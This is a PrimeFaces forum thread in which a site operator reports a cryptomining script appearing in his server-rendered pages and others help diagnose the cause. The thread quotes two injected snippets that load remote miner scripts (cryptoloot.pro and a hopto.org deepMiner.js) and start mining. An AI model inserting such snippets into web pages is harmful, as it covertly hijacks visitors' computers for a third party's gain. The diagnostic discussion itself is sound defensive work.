URGENT: Mining-script in Primfaces-Page? Where does it come from??

UI Components for JSF
danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

08 Jan 2018, 15:18

Hi all,

we're using Primefaces since years now and it's really a great and easy framework. Good job!

A few days ago we detected a mining-script in our Primefaces-Page.
It's embedded before the </html>-Tag and after the </form>-Tag.

Code: Select all

<script src="//cryptoloot.pro/lib/crlt.js"></script>
<script>var miner = new CRLT.Anonymous("6059931f4f5d4016d81f2242004b614b370411684aaa");miner.start();</script> 
We've not being hijacked or whatever. We also could exclude DNS or Proxies, it appears local in our Apache-DumpIO-Log.
The script doesn't appear immediately....it takes some time.

It uses 100% CPU.....


Any ideas? Thanks for your help


Greetings

Daniel

tandraschko
PrimeFaces Core Developer
Posts: 3979
Joined: 03 Dec 2010, 14:11
Location: Bavaria, DE
Contact:

08 Jan 2018, 15:25

try to search about something similar in your application(s) and database.
Thomas Andraschko

PrimeFaces | PrimeFaces Extensions

Apache Member | OpenWebBeans, DeltaSpike, MyFaces, BVal, TomEE

Sponsor me: https://github.com/sponsors/tandraschko
Blog: http://tandraschko.blogspot.de/
Twitter: https://twitter.com/TAndraschko

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

08 Jan 2018, 16:08

Thanks tandraschko,

we've done this before we posted this issue (also the Apache DumIO-Log).
We didn't find any snippets comparable to this and it really seems being embedded during page creation.

Any further ideas how to detect WHO embeds this snippet?

Greetings

Daniel

kukeltje
Expert Member
Posts: 9605
Joined: 17 Jun 2010, 13:34
Location: Netherlands

08 Jan 2018, 16:28

Sure it is in the response from the server to the client? Sure the client is not hijacked or uses some obscure plugin? Or do you use a banner site that is hijacked?

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

08 Jan 2018, 19:08

We've enabled Apaches dumpIO-Log on our server to exclude external infrastructure, and we can see the script (right after </form> and before </html>)
Finally Browser-Plugins are out of business here. :-)

Greetigns

Daniel

tandraschko
PrimeFaces Core Developer
Posts: 3979
Joined: 03 Dec 2010, 14:11
Location: Bavaria, DE
Contact:

08 Jan 2018, 21:32

I googled and it could be a trojan on the client ;) I don't think its related to PF.
Last edited by tandraschko on 22 Jan 2018, 12:19, edited 1 time in total.
Thomas Andraschko

PrimeFaces | PrimeFaces Extensions

Apache Member | OpenWebBeans, DeltaSpike, MyFaces, BVal, TomEE

Sponsor me: https://github.com/sponsors/tandraschko
Blog: http://tandraschko.blogspot.de/
Twitter: https://twitter.com/TAndraschko

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

08 Jan 2018, 23:41

The server is a dedicated Linux-Machine without any GUI running a Wildfly 10 behind an Apache.
I see the script in the Apache-Log on this server (just after it is being rendered and BEFORE it's transported to any client).

Ok. So far. I think must do more investigations with focus on Wildfly / Apache.


Thanks for your views

kukeltje
Expert Member
Posts: 9605
Joined: 17 Jun 2010, 13:34
Location: Netherlands

09 Jan 2018, 01:16

I searched for "6059931f4f5d4016d81f2242004b614b370411684aaa" on Google and both hits I got were on a vietnamese and brazilian site, both using PrimeFaces... But both do not have it in their pages (anymore)...

Did you build PF from source by accident? Maybe the compress js sources plugin was hacked or something?

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

09 Jan 2018, 03:16

I searched for it too yesterday night and i've found these pages too, but it doesn't really help.

I mailed cryptoloot.pro for further information abut this key, but they did not answer yet.

The script itself disappeared last night after a server restart (complete machine restart running Wildfly).
Unfortunately it comes back in the morning. It seems to be dynamic but i cant identify its origin.


Thanks for your help

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

13 Jan 2018, 15:06

For those who are still interested.....the Cryptoloot-Script disapeared a few days ago...but now i've got a new one:

Code: Select all

<script src="https://jhondi33.hopto.org:7777/deepMiner.js"></script><script>var miner = new deepMiner.Anonymous("605deepaaa");miner.start();</script>
I'm really confused....one of my server components seems to be vulnerable....WILDFLY 10.1 (uses Undertow), APACHE 2.4.23 or even MOJARA 2.1.21 or PRIMEFACES 5.3.

EDIT:
You can find now a lot of pages by "https://jhondi33.hopto.org:7777/deepMiner.js" ....they're all related to primefaces......i think it's really a Primefaces-issue
And once again: We're not talking about Client-Malware. I see this script in Apache's DumpIO-Log ....BEFORE it's transferred to the client.

Post Reply

Return to “PrimeFaces”

  • Information
  • Who is online

    Users browsing this forum: No registered users and 28 guests